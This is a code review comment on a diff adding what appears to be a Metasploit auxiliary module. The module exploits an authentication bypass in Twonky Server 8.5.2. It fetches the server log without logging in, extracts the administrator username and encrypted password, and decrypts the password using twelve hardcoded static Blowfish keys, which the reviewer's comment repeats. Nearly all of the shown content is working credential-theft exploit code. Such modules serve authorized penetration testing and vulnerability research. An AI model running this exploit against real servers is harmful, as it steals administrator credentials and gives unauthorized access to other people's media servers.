modules/auxiliary/gather/twonky_authbypass_logleak.rb

```diff
@@ -0,0 +1,154 @@
+    if (res&.code != 200) || (!res.body.include? '<modelNumber>8.5.2</modelNumber>')
+      fail_with(Failure::NotVulnerable, 'The target does not appear to be a Twonky Server instance running version 8.5.2')
+    end
+
+    print_good('The target is Twonky Server v8.5.2')
+
+    print_status('Attempting to leak the administrator username and encrypted password')
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'nmc', 'rpc', 'log_getfile')
+      }
+    )
+
+    fail_with(Failure::Unknown, 'Connection failed - unable to get log API response') unless res
+
+    # Grab the most recent (last) administrator username value from the logs
+    pattern = /accessuser\s*=\s*(\S+)\n/
+    result = res.body.scan(pattern).last
+
+    # If the log has been cleared since startup or the server hasn't restarted since setup
+    fail_with(Failure::NotFound, 'The target did not return a log file containing a username value') unless result
+
+    username = result[0]
+
+    print_good("The target returned the administrator username: #{username}")
+
+    # Grab the most recent (last) password value from the logs to decrypt
+    # "||" + hex number (key index) + hex Blowfish ECB ciphertext
+    pattern = /\|\|([0-9A-F]){1}([a-fA-F0-9]{16}(?:[a-fA-F0-9]{4})*)\n/
+    result = res.body.scan(pattern).last
+
+    # If the log has been cleared since the last password change or the server hasn't restarted since setup
+    fail_with(Failure::NotFound, 'The target did not return a log file containing a password value') unless result
+
+    # Extract the encryption key index as base16
+    enc_key_index = result[0]
+
+    # Handle possible match array containing more than minimum 16 chars (longer encrypted password)
+    if !result[2].nil?
+      enc_pwd = result[1] + result[2..].join
+    else
+      enc_pwd = result[1]
+    end
+
+    print_good("The target returned the encrypted password and key index: #{enc_pwd}, #{enc_key_index}")
+
+    # Decrypt the admin password using static key
+    password = decrypt_password(enc_pwd, enc_key_index)
+
+    print_good("Credentials decrypted: USER=#{username} PASS=#{password}")
+
+    report_vuln(
+      host: rhost,
+      name: name,
+      refs: references
+    )
+
+    store_loot('Twonky Server Credentials', 'text/plain', datastore['RHOST'], "Username: \"#{username}\" Password: \"#{password}\"")
+  end
+
+  # Decrypt the password using Blowfish ECB with the specified encryption key
+  def decrypt_password(pwd, key_num)
+    # Twonky Server 8.5.2 uses static encryption keys for passwords
+    static_keys = [
+      'E8ctd4jZwMbaV587',
+      'TGFWfWuW3cw28trN',
+      'pgqYY2g9atVpTzjY',
+      'KX7q4gmQvWtA8878',
+      'VJjh7ujyT8R5bR39',
+      'ZMWkaLp9bKyV6tXv',
+      'KMLvvq6my7uKkpxf',
+      'jwEkNvuwYCjsDzf5',
+      'FukE5DhdsbCjuKay',
+      'SpKNj6qYQGjuGMdd',
+      'qLyXuAHPTF2cPGWj',
+      'rKz7NBhM3vYg85mg'
+    ]
```

Comment:
Rather than define the keys every time a password is decrypted, this could be defined once in a method:

```ruby
    def static_keys
      [
        'E8ctd4jZwMbaV587',
        'TGFWfWuW3cw28trN',
        'pgqYY2g9atVpTzjY',
        'KX7q4gmQvWtA8878',
        'VJjh7ujyT8R5bR39',
        'ZMWkaLp9bKyV6tXv',
        'KMLvvq6my7uKkpxf',
        'jwEkNvuwYCjsDzf5',
        'FukE5DhdsbCjuKay',
        'SpKNj6qYQGjuGMdd',
        'qLyXuAHPTF2cPGWj',
        'rKz7NBhM3vYg85mg'
      ]
    end
```